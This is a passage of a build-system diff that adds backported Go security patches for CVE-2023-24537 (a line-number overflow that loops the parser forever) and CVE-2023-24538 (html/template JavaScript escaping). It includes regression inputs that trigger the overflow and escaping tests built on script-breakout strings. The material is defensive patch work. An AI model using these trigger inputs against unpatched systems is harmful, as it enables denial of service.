++			maxMemory -= mapEntryOverhead
+ 		}
+-		lim -= int64(len(value))
+-		if lim < 0 {
++		maxMemory -= int64(len(value))
++		if maxMemory < 0 {
+ 			// TODO: This should be a distinguishable error (ErrMessageTooLarge)
+ 			// to allow mime/multipart to detect it.
+ 			return m, errors.New("message too large")
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
new file mode 100644
index 0000000000..e04b717fc1
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
@@ -0,0 +1,76 @@
+From bf8c7c575c8a552d9d79deb29e80854dc88528d0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 20 Mar 2023 10:43:19 -0700
+Subject: [PATCH] [release-branch.go1.20] mime/multipart: limit parsed mime
+ message sizes
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802456
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802611
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: Ifdfa192d54f722d781a4d8c5f35b5fb72d122168
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481986
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/126a1d02da82f93ede7ce0bd8d3c51ef627f2104]
+CVE: CVE-2023-24537
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/go/parser/parser_test.go | 16 ++++++++++++++++
+ src/go/scanner/scanner.go    |  5 ++++-
+ 2 files changed, 20 insertions(+), 1 deletion(-)
+
+diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
+index 37a6a2b..714557c 100644
+--- a/src/go/parser/parser_test.go
++++ b/src/go/parser/parser_test.go
+@@ -738,3 +738,19 @@ func TestScopeDepthLimit(t *testing.T) {
+ 		}
+ 	}
+ }
++
++// TestIssue59180 tests that line number overflow doesn't cause an infinite loop.
++func TestIssue59180(t *testing.T) {
++	testcases := []string{
++		"package p\n//line :9223372036854775806\n\n//",
++		"package p\n//line :1:9223372036854775806\n\n//",
++		"package p\n//line file:9223372036854775806\n\n//",
++	}
++
++	for _, src := range testcases {
++		_, err := ParseFile(token.NewFileSet(), "", src, ParseComments)
++		if err == nil {
++			t.Errorf("ParseFile(%s) succeeded unexpectedly", src)
++		}
++	}
++}
+diff --git a/src/go/scanner/scanner.go b/src/go/scanner/scanner.go
+index 00fe2dc..3159d25 100644
+--- a/src/go/scanner/scanner.go
++++ b/src/go/scanner/scanner.go
+@@ -246,13 +246,16 @@ func (s *Scanner) updateLineInfo(next, offs int, text []byte) {
+ 		return
+ 	}
+ 
++	// Put a cap on the maximum size of line and column numbers.
++	// 30 bits allows for some additional space before wrapping an int32.
++	const maxLineCol = 1<<30 - 1
+ 	var line, col int
+ 	i2, n2, ok2 := trailingDigits(text[:i-1])
+ 	if ok2 {
+ 		//line filename:line:col
+ 		i, i2 = i2, i
+ 		line, col = n2, n
+-		if col == 0 {
++		if col == 0 || col > maxLineCol {
+ 			s.error(offs+i2, "invalid column number: "+string(text[i2:]))
+ 			return
+ 		}
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
new file mode 100644
index 0000000000..23c5075e41
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
@@ -0,0 +1,125 @@
+From 8acd01094d9ee17f6e763a61e49a8a808b3a9ddb Mon Sep 17 00:00:00 2001
+From: Brad Fitzpatrick <bradfitz@golang.org>
+Date: Mon, 2 Aug 2021 14:55:51 -0700
+Subject: [PATCH 1/6] net/netip: add new IP address package
+
+Co-authored-by: Alex Willmer <alex@moreati.org.uk> (GitHub @moreati)
+Co-authored-by: Alexander Yastrebov <yastrebov.alex@gmail.com>
+Co-authored-by: David Anderson <dave@natulte.net> (Tailscale CLA)
+Co-authored-by: David Crawshaw <crawshaw@tailscale.com> (Tailscale CLA)
+Co-authored-by: Dmytro Shynkevych <dmytro@tailscale.com> (Tailscale CLA)
+Co-authored-by: Elias Naur <mail@eliasnaur.com>
+Co-authored-by: Joe Tsai <joetsai@digital-static.net> (Tailscale CLA)
+Co-authored-by: Jonathan Yu <jawnsy@cpan.org> (GitHub @jawnsy)
+Co-authored-by: Josh Bleecher Snyder <josharian@gmail.com> (Tailscale CLA)
+Co-authored-by: Maisem Ali <maisem@tailscale.com> (Tailscale CLA)
+Co-authored-by: Manuel Mendez (Go AUTHORS mmendez534@...)
+Co-authored-by: Matt Layher <mdlayher@gmail.com>
+Co-authored-by: Noah Treuhaft <noah.treuhaft@gmail.com> (GitHub @nwt)
+Co-authored-by: Stefan Majer <stefan.majer@gmail.com>
+Co-authored-by: Terin Stock <terinjokes@gmail.com> (Cloudflare CLA)
+Co-authored-by: Tobias Klauser <tklauser@distanz.ch>
+
+Fixes #46518
+
+Change-Id: I0041f9e1115d61fa6e95fcf32b01d9faee708712
+Reviewed-on: https://go-review.googlesource.com/c/go/+/339309
+Run-TryBot: Brad Fitzpatrick <bradfitz@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+Trust: Brad Fitzpatrick <bradfitz@golang.org>
+
+Dependency Patch #1
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/a59e33224e42d60a97fa720a45e1b74eb6aaa3d0
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/internal/godebug/godebug.go      | 34 ++++++++++++++++++++++++++++++++++
+ src/internal/godebug/godebug_test.go | 34 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 68 insertions(+)
+ create mode 100644 src/internal/godebug/godebug.go
+ create mode 100644 src/internal/godebug/godebug_test.go
+
+diff --git a/src/internal/godebug/godebug.go b/src/internal/godebug/godebug.go
+new file mode 100644
+index 0000000..ac434e5
+--- /dev/null
++++ b/src/internal/godebug/godebug.go
+@@ -0,0 +1,34 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++// Package godebug parses the GODEBUG environment variable.
++package godebug
++
++import "os"
++
++// Get returns the value for the provided GODEBUG key.
++func Get(key string) string {
++	return get(os.Getenv("GODEBUG"), key)
++}
++
++// get returns the value part of key=value in s (a GODEBUG value).
++func get(s, key string) string {
++	for i := 0; i < len(s)-len(key)-1; i++ {
++		if i > 0 && s[i-1] != ',' {
++			continue
++		}
++		afterKey := s[i+len(key):]
++		if afterKey[0] != '=' || s[i:i+len(key)] != key {
++			continue
++		}
++		val := afterKey[1:]
++		for i, b := range val {
++			if b == ',' {
++				return val[:i]
++			}
++		}
++		return val
++	}
++	return ""
++}
+diff --git a/src/internal/godebug/godebug_test.go b/src/internal/godebug/godebug_test.go
+new file mode 100644
+index 0000000..41b9117
+--- /dev/null
++++ b/src/internal/godebug/godebug_test.go
+@@ -0,0 +1,34 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package godebug
++
++import "testing"
++
++func TestGet(t *testing.T) {
++	tests := []struct {
++		godebug string
++		key     string
++		want    string
++	}{
++		{"", "", ""},
++		{"", "foo", ""},
++		{"foo=bar", "foo", "bar"},
++		{"foo=bar,after=x", "foo", "bar"},
++		{"before=x,foo=bar,after=x", "foo", "bar"},
++		{"before=x,foo=bar", "foo", "bar"},
++		{",,,foo=bar,,,", "foo", "bar"},
++		{"foodecoy=wrong,foo=bar", "foo", "bar"},
++		{"foo=", "foo", ""},
++		{"foo", "foo", ""},
++		{",foo", "foo", ""},
++		{"foo=bar,baz", "loooooooong", ""},
++	}
++	for _, tt := range tests {
++		got := get(tt.godebug, tt.key)
++		if got != tt.want {
++			t.Errorf("get(%q, %q) = %q; want %q", tt.godebug, tt.key, got, tt.want)
++		}
++	}
++}
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch
new file mode 100644
index 0000000000..f200c41e16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch
@@ -0,0 +1,635 @@
+From 6fc21505614f36178df0dad7034b6b8e3f7588d5 Mon Sep 17 00:00:00 2001
+From: empijei <robclap8@gmail.com>
+Date: Fri, 27 Mar 2020 19:27:55 +0100
+Subject: [PATCH 2/6] html/template,text/template: switch to Unicode escapes
+ for JSON compatibility
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The existing implementation is not compatible with JSON
+escape as it uses hex escaping.
+Unicode escape, instead, is valid for both JSON and JS.
+This fix avoids creating a separate escaping context for
+scripts of type "application/ld+json" and it is more
+future-proof in case more JSON+JS contexts get added
+to the platform (e.g. import maps).
+
+Fixes #33671
+Fixes #37634
+
+Change-Id: Id6f6524b4abc52e81d9d744d46bbe5bf2e081543
+Reviewed-on: https://go-review.googlesource.com/c/go/+/226097
+Reviewed-by: Carl Johnson <me@carlmjohnson.net>
+Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
+Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+
+Dependency Patch #2
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/d4d298040d072ddacea0e0d6b55fb148fff18070
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/content_test.go  | 70 +++++++++++++++++++-------------------
+ src/html/template/escape_test.go   |  6 ++--
+ src/html/template/example_test.go  |  6 ++--
+ src/html/template/js.go            | 70 +++++++++++++++++++++++---------------
+ src/html/template/js_test.go       | 68 ++++++++++++++++++------------------
+ src/html/template/template_test.go | 39 +++++++++++++++++++++
+ src/text/template/exec_test.go     |  6 ++--
+ src/text/template/funcs.go         |  8 ++---
+ 8 files changed, 163 insertions(+), 110 deletions(-)
+
+diff --git a/src/html/template/content_test.go b/src/html/template/content_test.go
+index 72d56f5..bd86527 100644
+--- a/src/html/template/content_test.go
++++ b/src/html/template/content_test.go
+@@ -18,7 +18,7 @@ func TestTypedContent(t *testing.T) {
+		HTML(`Hello, <b>World</b> &amp;tc!`),
+		HTMLAttr(` dir="ltr"`),
+		JS(`c && alert("Hello, World!");`),
+-		JSStr(`Hello, World & O'Reilly\x21`),
++		JSStr(`Hello, World & O'Reilly\u0021`),
+		URL(`greeting=H%69,&addressee=(World)`),
+		Srcset(`greeting=H%69,&addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`),
+		URL(`,foo/,`),
+@@ -70,7 +70,7 @@ func TestTypedContent(t *testing.T) {
+				`Hello, <b>World</b> &amp;tc!`,
+				` dir=&#34;ltr&#34;`,
+				`c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+-				`Hello, World &amp; O&#39;Reilly\x21`,
++				`Hello, World &amp; O&#39;Reilly\u0021`,
+				`greeting=H%69,&amp;addressee=(World)`,
+				`greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+				`,foo/,`,
+@@ -100,7 +100,7 @@ func TestTypedContent(t *testing.T) {
+				`Hello,&#32;World&#32;&amp;tc!`,
+				`&#32;dir&#61;&#34;ltr&#34;`,
+				`c&#32;&amp;&amp;&#32;alert(&#34;Hello,&#32;World!&#34;);`,
+-				`Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\x21`,
++				`Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\u0021`,
+				`greeting&#61;H%69,&amp;addressee&#61;(World)`,
+				`greeting&#61;H%69,&amp;addressee&#61;(World)&#32;2x,&#32;https://golang.org/favicon.ico&#32;500.5w`,
+				`,foo/,`,
+@@ -115,7 +115,7 @@ func TestTypedContent(t *testing.T) {
+				`Hello, World &amp;tc!`,
+				` dir=&#34;ltr&#34;`,
+				`c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+-				`Hello, World &amp; O&#39;Reilly\x21`,
++				`Hello, World &amp; O&#39;Reilly\u0021`,
+				`greeting=H%69,&amp;addressee=(World)`,
+				`greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+				`,foo/,`,
+@@ -130,7 +130,7 @@ func TestTypedContent(t *testing.T) {
+				`Hello, &lt;b&gt;World&lt;/b&gt; &amp;tc!`,
+				` dir=&#34;ltr&#34;`,
+				`c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+-				`Hello, World &amp; O&#39;Reilly\x21`,
++				`Hello, World &amp; O&#39;Reilly\u0021`,
+				`greeting=H%69,&amp;addressee=(World)`,
+				`greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+				`,foo/,`,
+@@ -146,7 +146,7 @@ func TestTypedContent(t *testing.T) {
+				// Not escaped.
+				`c && alert("Hello, World!");`,
+				// Escape sequence not over-escaped.
+-				`"Hello, World & O'Reilly\x21"`,
++				`"Hello, World & O'Reilly\u0021"`,
+				`"greeting=H%69,\u0026addressee=(World)"`,
+				`"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
+				`",foo/,"`,
+@@ -162,7 +162,7 @@ func TestTypedContent(t *testing.T) {
+				// Not JS escaped but HTML escaped.
+				`c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+				// Escape sequence not over-escaped.
+-				`&#34;Hello, World &amp; O&#39;Reilly\x21&#34;`,
++				`&#34;Hello, World &amp; O&#39;Reilly\u0021&#34;`,
+				`&#34;greeting=H%69,\u0026addressee=(World)&#34;`,
+				`&#34;greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w&#34;`,
+				`&#34;,foo/,&#34;`,
+@@ -171,30 +171,30 @@ func TestTypedContent(t *testing.T) {
+		{
+			`<script>alert("{{.}}")</script>`,
+			[]string{
+-				`\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+-				`a[href =~ \x22\/\/example.com\x22]#foo`,
+-				`Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+-				` dir=\x22ltr\x22`,
+-				`c \x26\x26 alert(\x22Hello, World!\x22);`,
++				`\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++				`a[href =~ \u0022\/\/example.com\u0022]#foo`,
++				`Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++				` dir=\u0022ltr\u0022`,
++				`c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+				// Escape sequence not over-escaped.
+-				`Hello, World \x26 O\x27Reilly\x21`,
+-				`greeting=H%69,\x26addressee=(World)`,
+-				`greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++				`Hello, World \u0026 O\u0027Reilly\u0021`,
++				`greeting=H%69,\u0026addressee=(World)`,
++				`greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+				`,foo\/,`,
+			},
+		},
+		{
+			`<script type="text/javascript">alert("{{.}}")</script>`,
+			[]string{
+-				`\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+-				`a[href =~ \x22\/\/example.com\x22]#foo`,
+-				`Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+-				` dir=\x22ltr\x22`,
+-				`c \x26\x26 alert(\x22Hello, World!\x22);`,
++				`\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++				`a[href =~ \u0022\/\/example.com\u0022]#foo`,
++				`Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++				` dir=\u0022ltr\u0022`,
++				`c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+				// Escape sequence not over-escaped.
+-				`Hello, World \x26 O\x27Reilly\x21`,
+-				`greeting=H%69,\x26addressee=(World)`,
+-				`greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++				`Hello, World \u0026 O\u0027Reilly\u0021`,
++				`greeting=H%69,\u0026addressee=(World)`,
++				`greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+				`,foo\/,`,
+			},
+		},
+@@ -208,7 +208,7 @@ func TestTypedContent(t *testing.T) {
+				// Not escaped.
+				`c && alert("Hello, World!");`,
+				// Escape sequence not over-escaped.
+-				`"Hello, World & O'Reilly\x21"`,
++				`"Hello, World & O'Reilly\u0021"`,
+				`"greeting=H%69,\u0026addressee=(World)"`,
+				`"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
+				`",foo/,"`,
+@@ -224,7 +224,7 @@ func TestTypedContent(t *testing.T) {
+				`Hello, <b>World</b> &amp;tc!`,
+				` dir=&#34;ltr&#34;`,
+				`c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+-				`Hello, World &amp; O&#39;Reilly\x21`,
++				`Hello, World &amp; O&#39;Reilly\u0021`,
+				`greeting=H%69,&amp;addressee=(World)`,
+				`greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+				`,foo/,`,
+@@ -233,15 +233,15 @@ func TestTypedContent(t *testing.T) {
+		{
+			`<button onclick='alert("{{.}}")'>`,
+			[]string{
+-				`\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+-				`a[href =~ \x22\/\/example.com\x22]#foo`,
+-				`Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+-				` dir=\x22ltr\x22`,
+-				`c \x26\x26 alert(\x22Hello, World!\x22);`,
++				`\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++				`a[href =~ \u0022\/\/example.com\u0022]#foo`,
++				`Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++				` dir=\u0022ltr\u0022`,
++				`c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+				// Escape sequence not over-escaped.
+-				`Hello, World \x26 O\x27Reilly\x21`,
+-				`greeting=H%69,\x26addressee=(World)`,
+-				`greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++				`Hello, World \u0026 O\u0027Reilly\u0021`,
++				`greeting=H%69,\u0026addressee=(World)`,
++				`greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+				`,foo\/,`,
+			},
+		},
+@@ -253,7 +253,7 @@ func TestTypedContent(t *testing.T) {
+				`Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
+				`%20dir%3d%22ltr%22`,
+				`c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
+-				`Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
++				`Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
+				// Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is done.
+				`greeting=H%69,&amp;addressee=%28World%29`,
+				`greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
+@@ -268,7 +268,7 @@ func TestTypedContent(t *testing.T) {
+				`Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
+				`%20dir%3d%22ltr%22`,
+				`c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
+-				`Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
++				`Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
+				// Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is not done.
+				`greeting=H%69,&addressee=%28World%29`,
+				`greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index e72a9ba..c709660 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -238,7 +238,7 @@ func TestEscape(t *testing.T) {
+		{
+			"jsStr",
+			"<button onclick='alert(&quot;{{.H}}&quot;)'>",
+-			`<button onclick='alert(&quot;\x3cHello\x3e&quot;)'>`,
++			`<button onclick='alert(&quot;\u003cHello\u003e&quot;)'>`,
+		},
+		{
+			"badMarshaler",
+@@ -259,7 +259,7 @@ func TestEscape(t *testing.T) {
+		{
+			"jsRe",
+			`<button onclick='alert(/{{"foo+bar"}}/.test(""))'>`,
+-			`<button onclick='alert(/foo\x2bbar/.test(""))'>`,
++			`<button onclick='alert(/foo\u002bbar/.test(""))'>`,
+		},
+		{
+			"jsReBlank",
+@@ -825,7 +825,7 @@ func TestEscapeSet(t *testing.T) {
+				"main":   `<button onclick="title='{{template "helper"}}'; ...">{{template "helper"}}</button>`,
+				"helper": `{{11}} of {{"<100>"}}`,
+			},
+-			`<button onclick="title='11 of \x3c100\x3e'; ...">11 of &lt;100&gt;</button>`,
++			`<button onclick="title='11 of \u003c100\u003e'; ...">11 of &lt;100&gt;</button>`,
+		},
+		// A non-recursive template that ends in a different context.
+		// helper starts in jsCtxRegexp and ends in jsCtxDivOp.
+diff --git a/src/html/template/example_test.go b/src/html/template/example_test.go
+index 9d965f1..6cf936f 100644
+--- a/src/html/template/example_test.go
++++ b/src/html/template/example_test.go
+@@ -116,9 +116,9 @@ func Example_escape() {
+	// &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
+	// &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
+	// &#34;Fran &amp; Freddie&#39;s Diner&#34;32&lt;tasty@example.com&gt;
+-	// \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
+-	// \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
+-	// \"Fran \x26 Freddie\'s Diner\"32\x3Ctasty@example.com\x3E
++	// \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
++	// \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
++	// \"Fran \u0026 Freddie\'s Diner\"32\u003Ctasty@example.com\u003E
+	// %22Fran+%26+Freddie%27s+Diner%2232%3Ctasty%40example.com%3E
+
+ }
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index 0e91458..ea9c183 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -163,7 +163,6 @@ func jsValEscaper(args ...interface{}) string {
+	}
+	// TODO: detect cycles before calling Marshal which loops infinitely on
+	// cyclic data. This may be an unacceptable DoS risk.
+-
+	b, err := json.Marshal(a)
+	if err != nil {
+		// Put a space before comment so that if it is flush against
+@@ -178,8 +177,8 @@ func jsValEscaper(args ...interface{}) string {
+	// TODO: maybe post-process output to prevent it from containing
+	// "<!--", "-->", "<![CDATA[", "]]>", or "</script"
+	// in case custom marshalers produce output containing those.
+-
+-	// TODO: Maybe abbreviate \u00ab to \xab to produce more compact output.
++	// Note: Do not use \x escaping to save bytes because it is not JSON compatible and this escaper
++	// supports ld+json content-type.
+	if len(b) == 0 {
+		// In, `x=y/{{.}}*z` a json.Marshaler that produces "" should
+		// not cause the output `x=y/*z`.
+@@ -260,6 +259,8 @@ func replace(s string, replacementTable []string) string {
+		r, w = utf8.DecodeRuneInString(s[i:])
+		var repl string
+		switch {
++		case int(r) < len(lowUnicodeReplacementTable):
++			repl = lowUnicodeReplacementTable[r]
+		case int(r) < len(replacementTable) && replacementTable[r] != "":
+			repl = replacementTable[r]
+		case r == '\u2028':
+@@ -283,67 +284,80 @@ func replace(s string, replacementTable []string) string {
+	return b.String()
+ }
+
++var lowUnicodeReplacementTable = []string{
++	0: `\u0000`, 1: `\u0001`, 2: `\u0002`, 3: `\u0003`, 4: `\u0004`, 5: `\u0005`, 6: `\u0006`,
++	'\a': `\u0007`,
++	'\b': `\u0008`,
++	'\t': `\t`,
++	'\n': `\n`,
++	'\v': `\u000b`, // "\v" == "v" on IE 6.
++	'\f': `\f`,
++	'\r': `\r`,
++	0xe:  `\u000e`, 0xf: `\u000f`, 0x10: `\u0010`, 0x11: `\u0011`, 0x12: `\u0012`, 0x13: `\u0013`,
++	0x14: `\u0014`, 0x15: `\u0015`, 0x16: `\u0016`, 0x17: `\u0017`, 0x18: `\u0018`, 0x19: `\u0019`,
++	0x1a: `\u001a`, 0x1b: `\u001b`, 0x1c: `\u001c`, 0x1d: `\u001d`, 0x1e: `\u001e`, 0x1f: `\u001f`,
++}
++
+ var jsStrReplacementTable = []string{
+-	0:    `\0`,
++	0:    `\u0000`,
+	'\t': `\t`,
+	'\n': `\n`,
+-	'\v': `\x0b`, // "\v" == "v" on IE 6.
++	'\v': `\u000b`, // "\v" == "v" on IE 6.
+	'\f': `\f`,
+	'\r': `\r`,
+	// Encode HTML specials as hex so the output can be embedded
+	// in HTML attributes without further encoding.
+-	'"':  `\x22`,
+-	'&':  `\x26`,
+-	'\'': `\x27`,
+-	'+':  `\x2b`,
++	'"':  `\u0022`,
++	'&':  `\u0026`,
++	'\'': `\u0027`,
++	'+':  `\u002b`,
+	'/':  `\/`,
+-	'<':  `\x3c`,
+-	'>':  `\x3e`,
++	'<':  `\u003c`,
++	'>':  `\u003e`,
+	'\\': `\\`,
+ }
+
+ // jsStrNormReplacementTable is like jsStrReplacementTable but does not
+ // overencode existing escapes since this table has no entry for `\`.
+ var jsStrNormReplacementTable = []string{
+-	0:    `\0`,
++	0:    `\u0000`,
+	'\t': `\t`,
+	'\n': `\n`,
+-	'\v': `\x0b`, // "\v" == "v" on IE 6.
++	'\v': `\u000b`, // "\v" == "v" on IE 6.
+	'\f': `\f`,
+	'\r': `\r`,
+	// Encode HTML specials as hex so the output can be embedded
+	// in HTML attributes without further encoding.
+-	'"':  `\x22`,
+-	'&':  `\x26`,
+-	'\'': `\x27`,
+-	'+':  `\x2b`,
++	'"':  `\u0022`,
++	'&':  `\u0026`,
++	'\'': `\u0027`,
++	'+':  `\u002b`,
+	'/':  `\/`,
+-	'<':  `\x3c`,
+-	'>':  `\x3e`,
++	'<':  `\u003c`,
++	'>':  `\u003e`,
+ }
+-
+ var jsRegexpReplacementTable = []string{
+-	0:    `\0`,
++	0:    `\u0000`,
+	'\t': `\t`,
+	'\n': `\n`,
+-	'\v': `\x0b`, // "\v" == "v" on IE 6.
++	'\v': `\u000b`, // "\v" == "v" on IE 6.
+	'\f': `\f`,
+	'\r': `\r`,
+	// Encode HTML specials as hex so the output can be embedded
+	// in HTML attributes without further encoding.
+-	'"':  `\x22`,
++	'"':  `\u0022`,
+	'$':  `\$`,
+-	'&':  `\x26`,
+-	'\'': `\x27`,
++	'&':  `\u0026`,
++	'\'': `\u0027`,
+	'(':  `\(`,
+	')':  `\)`,
+	'*':  `\*`,
+-	'+':  `\x2b`,
++	'+':  `\u002b`,
+	'-':  `\-`,
+	'.':  `\.`,
+	'/':  `\/`,
+-	'<':  `\x3c`,
+-	'>':  `\x3e`,
++	'<':  `\u003c`,
++	'>':  `\u003e`,
+	'?':  `\?`,
+	'[':  `\[`,
+	'\\': `\\`,
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index 075adaa..d7ee47b 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -137,7 +137,7 @@ func TestJSValEscaper(t *testing.T) {
+		{"foo", `"foo"`},
+		// Newlines.
+		{"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
+-		// "\v" == "v" on IE 6 so use "\x0b" instead.
++		// "\v" == "v" on IE 6 so use "\u000b" instead.
+		{"\t\x0b", `"\t\u000b"`},
+		{struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
+		{[]interface{}{}, "[]"},
+@@ -173,7 +173,7 @@ func TestJSStrEscaper(t *testing.T) {
+	}{
+		{"", ``},
+		{"foo", `foo`},
+-		{"\u0000", `\0`},
++		{"\u0000", `\u0000`},
+		{"\t", `\t`},
+		{"\n", `\n`},
+		{"\r", `\r`},
+@@ -183,14 +183,14 @@ func TestJSStrEscaper(t *testing.T) {
+		{"\\n", `\\n`},
+		{"foo\r\nbar", `foo\r\nbar`},
+		// Preserve attribute boundaries.
+-		{`"`, `\x22`},
+-		{`'`, `\x27`},
++		{`"`, `\u0022`},
++		{`'`, `\u0027`},
+		// Allow embedding in HTML without further escaping.
+-		{`&amp;`, `\x26amp;`},
++		{`&amp;`, `\u0026amp;`},
+		// Prevent breaking out of text node and element boundaries.
+-		{"</script>", `\x3c\/script\x3e`},
+-		{"<![CDATA[", `\x3c![CDATA[`},
+-		{"]]>", `]]\x3e`},
++		{"</script>", `\u003c\/script\u003e`},
++		{"<![CDATA[", `\u003c![CDATA[`},
++		{"]]>", `]]\u003e`},
+		// https://dev.w3.org/html5/markup/aria/syntax.html#escaping-text-span
+		//   "The text in style, script, title, and textarea elements
+		//   must not have an escaping text span start that is not
+@@ -201,11 +201,11 @@ func TestJSStrEscaper(t *testing.T) {
+		// allow regular text content to be interpreted as script
+		// allowing script execution via a combination of a JS string
+		// injection followed by an HTML text injection.
+-		{"<!--", `\x3c!--`},
+-		{"-->", `--\x3e`},
